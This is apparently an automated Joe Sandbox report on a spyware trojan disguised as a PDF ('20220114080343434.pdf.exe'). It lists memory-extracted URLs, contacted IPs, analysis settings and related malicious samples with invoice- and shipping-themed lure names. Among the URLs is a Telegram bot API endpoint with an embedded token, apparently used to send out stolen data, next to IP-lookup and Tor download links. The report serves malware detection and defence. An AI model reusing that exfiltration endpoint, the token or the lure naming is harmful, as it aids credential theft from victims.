                                          http://www.sajatypeworks.comW20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPlease20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cne&20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.ascendercorp.com/typedesigners.html20220114080343434.pdf.exe, 00000000.00000003.289190210.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289318058.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289093184.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289252588.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289143103.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288858385.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288983388.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289034401.0000000005CF3000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comuy20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fonts.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.kr20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                              high
                                              http://www.sajatypeworks.coma20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPlease20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://xXcVm5kmD6Gyza.org(RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fonts.comiv20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.de20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cn20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.como.20220114080343434.pdf.exe, 00000000.00000003.286962308.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.net(20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.tiro.com5v20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designersr20220114080343434.pdf.exe, 00000000.00000003.292082396.0000000005CEF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.020220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286760496.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286824795.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286816564.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286767765.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286924962.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286942039.0000000005D04000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://DynDns.comDynDNSRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmld20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.coms20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cnTC20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://xXcVm5kmD6Gyza.orgRegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.coma20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://en.w20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.ipify.org%$RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.carterandcone.coml20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cn/20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlN20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.html20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.html20220114080343434.pdf.exe, 00000000.00000003.291923026.0000000005CEF000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn920220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.comn-u/20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.sandoll.co.krr-t20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers820220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmNp20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295250238.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295200642.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comesS20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.typography.netiv20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.urwpp.dem20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://fontfabrik.com(20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                http://api.telegram.orgRegSvcs.exe, 00000008.00000002.557264398.0000000003712000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designers/d20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.kru-hX20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comic20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.micro.20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.urwpp.dec20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                      Analysis ID:553218
                                                                      Start date:14.01.2022
                                                                      Start time:13:53:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 24s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:20220114080343434.pdf.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:24
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@1/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 57
                                                                      • Number of non-executed functions: 6
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: 20220114080343434.pdf.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      13:54:02API Interceptor1x Sleep call for process: 20220114080343434.pdf.exe modified
                                                                      13:54:16API Interceptor741x Sleep call for process: RegSvcs.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      149.154.167.22020220114080343434.pdf.exeGet hashmaliciousBrowse
                                                                        K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                          lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                                            ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                              Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                                AWB INVOICE.exeGet hashmaliciousBrowse
                                                                                  Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                    tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                      DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                        payment.exeGet hashmaliciousBrowse
                                                                                          Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                            Shipping Doc.exeGet hashmaliciousBrowse
                                                                                              L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                                Three.exeGet hashmaliciousBrowse
                                                                                                  KRAKEN.exeGet hashmaliciousBrowse
                                                                                                    Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                                      QbmHheKRGM.exeGet hashmaliciousBrowse
                                                                                                        Z9dbLkBVl6.exeGet hashmaliciousBrowse
                                                                                                          payment advise.exeGet hashmaliciousBrowse
                                                                                                            New_Order.exeGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              api.telegram.orgK5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              #NEW ORDER FOR JANUARY 2022.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PwlvCShFVJ.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              zo1zCvVfYM.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              AWB INVOICE.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              payment.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Three.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              eWZLusfgI7.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              KRAKEN.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              TELEGRAMRU20220114080343434.pdf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              K5CrmTWqYm.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              lJFlbD0vMzZDdIO.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ai4kogd3SP.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Trainer v5.1.1.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              AWB INVOICE.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              payment.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              L9sruKoGsQ.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Three.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              KRAKEN.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Fiyat Talebi 2022.01.12.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QbmHheKRGM.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Z9dbLkBVl6.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              payment advise.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              New_Order.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0e20220114080343434.pdf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Visual CertExam Suite_3.0.1.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PYD04k22Hf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              20145639704.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              BzYdfSiOVH.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              oyNoKMONxj.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              bf89b4a3ed5662649d245f4e21ec171f8c7c14b415604.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              inMail 30575 Onesourcescreening.htmlGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              7wvFbzoGf4.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Amended Copy of Invoice.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              tivDpdRokf.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL Shipping doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              payment.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Munish Chaudhary - Procurement Division.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              brwncald.com-e-FAX-50145-pdf.htmGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              eq3_new_purchase_order_1642002549.xls.htmGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              UX7Kty3cwt.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Three.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220
                                                                                                              SecuriteInfo.com.Program.Unwanted.3981.14233.exeGet hashmaliciousBrowse
                                                                                                              • 149.154.167.220

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.log
                                                                                                              Process:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310
                                                                                                              Entropy (8bit):5.345651901398759
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
                                                                                                              MD5:A9EFF9253CAF99EC8665E41D736DDAED
                                                                                                              SHA1:D95BB4ABC856D774DA4602A59DE252B4BF560530
                                                                                                              SHA-256:DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
                                                                                                              SHA-512:96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
                                                                                                              Malicious:true
                                                                                                              Reputation:moderate, very likely benign file
